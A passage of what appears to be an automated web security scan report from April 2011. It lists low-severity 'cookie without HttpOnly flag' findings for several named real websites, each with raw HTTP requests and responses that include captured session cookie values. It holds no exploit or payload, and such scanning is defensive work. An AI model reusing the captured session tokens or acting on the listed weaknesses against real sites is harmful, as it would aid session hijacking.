Set-Cookie: ASPSESSIONIDQQQASDQQ=NNOLHEFCAHOOGAAPGKOENPGL; path=/
Date: Mon, 25 Apr 2011 12:54:47 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.fusionvm.com/FusionVM">here</a>.</body>
17.49. http://www.gartner.com/technology/contact/contact_gartner.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/contact/contact_gartner.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>


<!-- Changes to title and meta tags
...[SNIP]...
17.50. http://www.integritydefender.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.integritydefender.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=dc2d6e2ab4b800fc3fe5b92b56c23862; path=/
Content-Type: text/html
Content-Length: 14234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
17.51. http://www.internetreputationmanagement.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.internetreputationmanagement.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:06 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=jdc0ug637ehtjrcdllsnmave75; expires=Wed, 18-May-2011 19:26:26 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
17.52. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/images/bg-tab.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/all/themes/newtheme/images/bg-tab.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.internetreputationmanagement.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 15:53:49 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=nid2651v1v78l5k1j020guaaj4; expires=Wed, 18-May-2011 19:27:09 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
17.53. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/js/Coolvetica_400.font.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/js/Coolvetica_400.font.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/all/themes/newtheme/js/Coolvetica_400.font.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.internetreputationmanagement.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 15:53:34 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=5ubacchis5c6mimmiun2vqaqu6; expires=Wed, 18-May-2011 19:26:54 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
17.54. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
17.55. http://www.netsuite.com/app/site/hit/tracker.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /app/site/hit/tracker.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/hit/tracker.nl?c=NLCORP&n=1&type=page&siteroot=live_6_23_05&url=portal%2Fpage_not_found.shtml&referer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; mbox=session#1303736347554-914602#1303744312|PC#1303736347554-914602.17#1366814452|check#true#1303742512; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.1.10.1303742452

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: 2009164861:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 15:13:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=5mXTN1PVw6dygQkdTVTmXQgT7Cs1LMQ7tWgfgqb1Rp1BX437XsxLy1dTQm6Xd61SYY2ZsXLhQkmy4d23GShKhWWrGHXSJJFCxR51kXMRQWvG7LddhvNGGGnyWDf82cDj!-2139436563; path=/
Set-Cookie: NLVisitorId=rcHW85B5AVBeOVDe; domain=www.netsuite.com; expires=Sunday, 15-Apr-2012 15:13:57 GMT; path=/
Set-Cookie: NLShopperId=rcHW85B5AVReOThy; domain=www.netsuite.com; expires=Monday, 02-May-2011 15:13:57 GMT; path=/

17.56. http://www.smpone.com/images/captcha.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /images/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/captcha.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733901

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b07217b91d15829f50a400a4c700d48f; path=/
Content-Type: image/jpeg
Content-Length: 5320

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
17.57. http://www.supportskins.com/support/visitor/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supportskins.com
Path:   /support/visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/visitor/index.php?_m=livesupport&_a=htmlcode&nolink=1 HTTP/1.1
Host: www.supportskins.com
Proxy-Connection: keep-alive
Referer: http://www.supportskins.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:44:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Tue, 26 Apr 2011 19:44:09 GMT
Cache-Control: max-age=3600, must-revalidate
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Set-Cookie: SWIFT_sessionid80=54t8w28c4vfha2atf8xfy2cvwq4ze2ex; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Content-Type: text/javascript
Content-Length: 11618

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
17.58. http://www.tresware.com/images/captcha.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /images/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/captcha.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303734004

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2629f9017c7f7d7f31d4a3886871e1e7; path=/
Content-Type: image/jpeg
Content-Length: 5090

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
17.59. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
17.60. http://www.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:31:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=2n1cf7i0t32ddb9p37lotpq330; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Trus
...[SNIP]...
17.61. http://www.trust-guard.com/PCI-scanning-s/39.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trust-guard.com
Path:   /PCI-scanning-s/39.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PCI-scanning-s/39.htm HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:29:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=l47skohjorenr7a3efph75kgb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PCI
...[SNIP]...
17.62. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if
17.63. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
